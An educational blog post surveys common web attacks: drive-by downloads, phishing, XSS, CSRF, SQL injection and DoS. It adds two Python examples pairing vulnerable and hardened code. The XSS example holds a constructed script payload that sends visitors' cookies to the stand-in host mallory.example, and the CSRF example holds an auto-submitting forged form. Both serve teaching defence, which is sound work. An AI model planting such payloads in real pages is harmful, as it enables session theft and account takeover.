Connectivity and always-on access can be wonderful. The Internet and the wide range of connected devices have made access to digital resources as easy as a mouse-click or a touch. But with increased convenience come increased security risks. Every connection to the Internet, and every web page, offers another opportunity for attackers to cause damage, gain unauthorized access to information, and impersonate other users. This post gives a brief discussion of various ways in which attackers cause problems for almost all of us.
Drive-by Downloading is a method used by attackers to get their malicious code on a user’s machine by causing it to be downloaded without the user’s knowledge or consent.
We start with drive-by downloading because it is closely tied to our discussion in the malware post. Attackers have to find ways to get their malicious code onto a user's machine, and one way to do this is called drive-by downloading. Let's say you are surfing the web, and you click on a link to what you think is a legitimate website. When you get there, it might even appear to be a good website, but what you don't know is that a script on the page ran automatically, took advantage of a weakness in your browser or one of its plugins, and downloaded code to your machine without your knowledge or authorization. Sometimes drive-by downloading is done with the user's authorization but without their full knowledge. For example, you might think you are downloading a video, but what you don't know is that a second, malicious piece of code is bundled with it and is now being downloaded to your machine. Keep in mind that not all the downloaded code has to be outright malicious. Sometimes it is just annoying and causes problems by slowing the machine down.
The following article gives some real-world examples of drive-by download attacks and lists 6 ways that companies can protect their users against drive-by downloading attacks.
http://www.cio.com/article/2448967/security0/6-ways-to-defend-against-drive-by-downloads.html
Phishing is a word used to describe how an attacker “phishes” for user information by using both social engineering and digital techniques to trick a user into divulging private and valuable information.
Phishing is a common way that attackers try to get information from unwary users. This kind of attack relies heavily on social engineering, that is, getting information by exploiting or tricking humans directly. For example, an attacker may send an e-mail asking the recipient to verify their account information. When the recipient clicks on the link, he is directed to a web page that looks legitimate but is actually a fake. Then, when he types in his username and password, the information is sent to the attacker, who now has the authentication credentials and can log in as the victim.
The following article from Norton by Symantec offers a brief explanation of phishing and 7 tips for protecting yourself against it:
http://us.norton.com/7-tips-to-protect-against-phishing/article
Cross-Site Scripting (XSS) is an attack in which a malicious user gets her own script into a page served by a website, so that when another unsuspecting user views that page, the script runs in his browser with the site's privileges, possibly stealing valuable information.
A sizable portion of web attacks are cross-site scripting (XSS) attacks, which take advantage of websites that place user-supplied text into their pages without encoding it, so that the browser treats the text as HTML and script rather than as plain text. For example, consider a website where users can log in and post comments on a message board. Like many sites that require authentication, the site sets a cookie (a small piece of data the browser stores and sends back with every request to that site) containing a session token that proves the user has logged in. The cookie holds a token, not the password itself, but whoever holds the token is treated as that user for as long as the session lasts. Let's say Alice logs in to the website and her browser stores the session cookie. Then she goes to the message board and sees that Mallory has posted a comment about an article. She opens the message and reads "This was a really great article!" but what she doesn't know is that Mallory also embedded some JavaScript in the comment that is not visible, and that it ran in Alice's browser as soon as the page was rendered. Without her knowledge, it sent a request to Mallory's website carrying Alice's cookie. This means that Mallory now has Alice's session token and can make requests to the site as Alice.
The following article explains different kinds of XSS attacks in more detail and gives some examples of XSS attacks.
http://www.thegeekstuff.com/2012/02/xss-attack-examples/
Protecting against XSS attacks. Preventing XSS attacks requires good programming when building websites. There are many ways for an attacker to cause an XSS attack, so web developers must be aware of the possible vulnerabilities and take measures to eliminate them. There are many resources online about preventing XSS attacks, but many are very technical and beyond the scope of this posting. Keep in mind, though, that XSS attacks ride on user-supplied input, so prevention is about how that input is handled: the developer must encode untrusted data for the place in the page where it is inserted (HTML body, attribute, JavaScript, URL) so that the browser displays it as text rather than running it, and should limit what a user can post where that is practical. Marking the session cookie HttpOnly also keeps script from reading it, which blunts the cookie-theft scenario above. According to the "Cheat Sheet" below, "The first rule is to deny all," that is, never put untrusted data into a page except in a few well-defined, properly encoded places.
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
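The message-board scenario above, worked through as an added example (not code from the original post). Mallory's comment, the attacker hostname mallory.example and the page markup are constructed for illustration. The vulnerable renderer pastes the comment straight into the HTML; the hardened one HTML-encodes it for the body context, and the cookie helper shows the HttpOnly attribute that keeps document.cookie out of reach of any script that does run:

```python
import html

# Constructed sample: the comment Mallory posts. The visible text is harmless; the
# <script> tag is the stored-XSS payload. It ships every visitor's cookies to an
# attacker-controlled host (mallory.example is a hypothetical name).
MALLORY_COMMENT = (
    "This was a really great article!"
    '<script>new Image().src="https://mallory.example/steal?c="+document.cookie</script>'
)


def render_comment_unsafe(author, body):
    """Vulnerable rendering: untrusted text is pasted straight into the HTML, so any
    tags it contains become part of the page and any script in it runs in the
    browser of everyone who views the message board."""
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def render_comment_safe(author, body):
    """Hardened rendering: untrusted text is HTML-encoded for the HTML-body context.
    '<', '>', '&' and quotes become entities, so the browser displays Mallory's
    payload as text instead of executing it."""
    return (
        f'<div class="comment"><b>{html.escape(author, quote=True)}</b>: '
        f"{html.escape(body, quote=True)}</div>"
    )


def session_cookie_header(session_token):
    """Set-Cookie header for the session. The cookie carries an opaque session token,
    never the password. HttpOnly keeps document.cookie from reading it, so even a
    script that does run cannot copy it; Secure and SameSite limit where the browser
    will send it."""
    return f"Set-Cookie: session={session_token}; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_live_script(markup):
    """True if the markup still contains a <script> tag the browser would execute."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_comment_unsafe("Mallory", MALLORY_COMMENT))
    print(render_comment_safe("Mallory", MALLORY_COMMENT))
    print(session_cookie_header("5f3c-example-token"))
```

Encoding is context-specific: html.escape is right for text placed in the HTML body or inside a quoted attribute, but data inserted into a script block or a URL needs the encoder for that context, which is what the OWASP rules above enumerate.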
Cross-Site Request Forgery (XSRF, also written CSRF) is another kind of browser-based attack in which an attacker gets a logged-in user's browser to load attacker-controlled content, such as a malicious website, that causes a request to be sent back to the original website. The browser automatically attaches the user's cookies to that request, so the site treats it as the user's own.
This kind of attack takes advantage of a website's trust in a user's browser. Let's use the example of the message board again. This time, Alice logs in and again her session cookie is stored in her browser. One of the conveniences of cookies is that if Alice goes to another website without logging out of the first website, then returns to the message board website, she won't have to log back in; the browser sends the cookie along with every request to the board, no matter which page started the request. Unfortunately, this also presents an opportunity for Cross-Site Request Forgery. So Alice logs in and sees that Mallory has posted a link to a funny dog picture. Alice clicks on the link and is taken to a page that does indeed contain a funny dog picture. What she doesn't know is that it also contains a hidden form (or an image tag, or a one-line script) that fires automatically when the funny dog picture page loads. This sends a request through the browser back to the message board, the browser attaches Alice's cookie, and the board posts something under Alice's name. The page never redirects. Alice never knows. This may seem innocent, right? How much damage can Mallory do by posting something on a message board with Alice's credentials? But what if it wasn't a message board? What if it was Alice's bank account, and the request Mallory forged told Alice's bank to transfer funds from Alice's account into Mallory's?
Protecting against XSRF attacks. Like XSS attacks, preventing XSRF attacks requires good programming in web development. The usual defense is to require that every state-changing request carry a secret token that only the site's own pages can supply; a forged request from Mallory's page has the cookie but not the token, and is rejected. The two attack types are related in that an XSS vulnerability on the site lets the attacker's script read that token, so XSS defeats XSRF defenses. This does not mean that one is necessary for the other, but it does mean that good web development requires prevention of both kinds of attacks. The link below outlines common prevention measures that are not sufficient, as well as measures that will help prevent XSRF attacks.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
From a user standpoint, it is a good idea to log out of a website when leaving, because XSRF attacks depend on the browser still holding a valid session cookie for the site; logging out invalidates that session, so a forged request has nothing to ride on.
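The forged-post scenario and the token defense described above, as an added example (not code from the original post). The board hostname board.example, Mallory's page markup and the in-memory session store are constructed for illustration; the defense shown is the synchronizer token pattern from the OWASP cheat sheet linked above:

```python
import hmac
import secrets

# In-memory session store, standing in for whatever the message board really uses.
# Maps session cookie value -> {"user": ..., "csrf": ...}
SESSIONS = {}


def login(user):
    """Create a session and return the value the browser will store as the session
    cookie. A fresh, unguessable CSRF token is bound to the session at the same time."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_post_form(sid):
    """The board's own 'new post' form carries the session's token in a hidden field.
    Only a page served by the board can read that token; Mallory's site cannot."""
    token = SESSIONS[sid]["csrf"]
    return (
        '<form method="POST" action="https://board.example/post">'
        f'<input type="hidden" name="csrf" value="{token}">'
        '<input name="message"><button>Post</button></form>'
    )


def handle_post_vulnerable(cookies, form):
    """Before the fix: any request that arrives with a valid session cookie is
    accepted. The browser attaches Alice's cookie to Mallory's forged request too."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    return 200, f"posted as {session['user']}: {form.get('message')}"


def handle_post(cookies, form):
    """After the fix (synchronizer token pattern): a state-changing POST must carry
    the token bound to the session. The comparison is constant-time."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return 401, "not logged in"
    supplied = form.get("csrf", "").encode()
    if not hmac.compare_digest(supplied, session["csrf"].encode()):
        return 403, "missing or wrong CSRF token"
    return 200, f"posted as {session['user']}: {form.get('message')}"


# Constructed sample: what Mallory's funny-dog page contains besides the picture.
# Nothing here runs inside the board's origin; a plain form plus a one-line submit
# (or an <img> tag, for GET endpoints) is enough to make the browser send the request.
MALLORY_PAGE = (
    '<img src="dog.jpg">'
    '<form id="f" method="POST" action="https://board.example/post">'
    '<input type="hidden" name="message" value="Alice says: visit mallory.example!">'
    "</form><script>document.getElementById('f').submit()</script>"
)


def forged_request(sid, handler):
    """Simulates the browser sending Mallory's form: Alice's session cookie rides
    along automatically, but the form has no csrf field."""
    return handler({"session": sid}, {"message": "Alice says: visit mallory.example!"})


def legitimate_request(sid, handler):
    """Simulates Alice submitting the board's own form, token included."""
    return handler({"session": sid}, {"csrf": SESSIONS[sid]["csrf"], "message": "Nice dog!"})


if __name__ == "__main__":
    sid = login("alice")
    print(forged_request(sid, handle_post_vulnerable))
    print(forged_request(sid, handle_post))
    print(legitimate_request(sid, handle_post))
```

The token must be tied to the session (not a global constant) and must not be readable cross-origin, which is exactly why an XSS hole on the board breaks this defense: Mallory's script would run inside the board's origin and could read the hidden field.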
SQL Injection is a database-centered attack in which an attacker is able to read or change information in a database by entering SQL code into a web form (or any other input) that the application splices into a database query.
Many websites connect to and communicate with databases in order to perform certain tasks. For example, just logging in to a website requires interaction with a database that contains usernames and passwords (or, in a well-built site, password hashes). SQL is the language used for communicating with most of these databases. A SQL injection attack is when an attacker, given the opportunity to communicate with a database through a website (such as through a log-in page), types in a fragment of SQL instead of what is expected. If the code that builds the query is not written securely, the attacker's text becomes part of the query and the attacker may succeed in getting unauthorized access to the database. Such access could mean the ability to read information such as usernames and passwords, or to delete or change information in the database. Consider a website that requires a secret key for registration. With a successful SQL injection attack, someone might be able to bypass the secret key requirement and add his username and password to the database, thereby gaining unauthorized access to the website.
Preventing SQL Injection. Like XSS attacks, SQL injection attacks are largely prevented by how user input is handled, which of course is largely the responsibility of the web developer. SQL injection is made possible when text from a user is pasted directly into the SQL that is sent to the database. The primary defense is to keep the two apart: use parameterized queries (prepared statements), in which the SQL text is fixed and the user's values are passed separately, so that anything an attacker types is treated as a string of characters to compare against rather than as part of the command. Escaping or validating input is a secondary measure, not a replacement. The following links give more detailed information on SQL injection prevention.
https://xkcd.com/327/
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
http://www.w3schools.com/sql/sql_injection.asp
Denial of Service (DoS) is a network-related attack in which a resource, such as a particular web server, is bombarded with so many requests (often from spoofed IP addresses) that it is overwhelmed and becomes unavailable to legitimate users.
This network attack can also disrupt interaction with a specific web page. In order to access a website, the user sends a request to the website and receives a response. There is a standard procedure for this, and the basic idea of a Denial of Service (DoS) attack is that an attacker sends so many requests to a server that its capacity (bandwidth, connections, CPU or memory) is used up and it can no longer serve other users; sometimes it crashes outright. A Distributed Denial of Service (DDoS) attack is one in which the requests come from many different hosts. Often this is done by a botnet, an army of compromised machines acting without their owners' knowledge. Basically, an attacker first gains control of a large number of machines. Then, at a pre-arranged time, all the machines send requests to the website to knock it offline. DoS attacks can be very costly for critical websites that need to be accessible to users at all times. Some DoS attacks are motivated by revenge, others by financial gain, and others by activism. One example of financial gain is when cyber criminals send a letter to a corporation threatening a DoS attack unless they receive payment by a certain time. An example of activism would be an attacker taking down a political website because she disagrees with the website's views.
The following articles include real-world examples of DoS/DDoS attacks:
http://www.independent.co.uk/life-style/gadgets-and-tech/worlds-largest-denial-of-service-attack-caused-by-vulnerability-in-the-infrastructure-of-the-web-9122200.html
http://www.net-security.org/secworld.php?id=11748
The following stackexchange post gives a brief explanation of DDoS attack prevention measures:
http://security.stackexchange.com/questions/73369/how-do-major-sites-prevent-ddos
See the video on “The Internet: Cybersecurity and Crime” at code.org for a good introduction to Network and Web Security.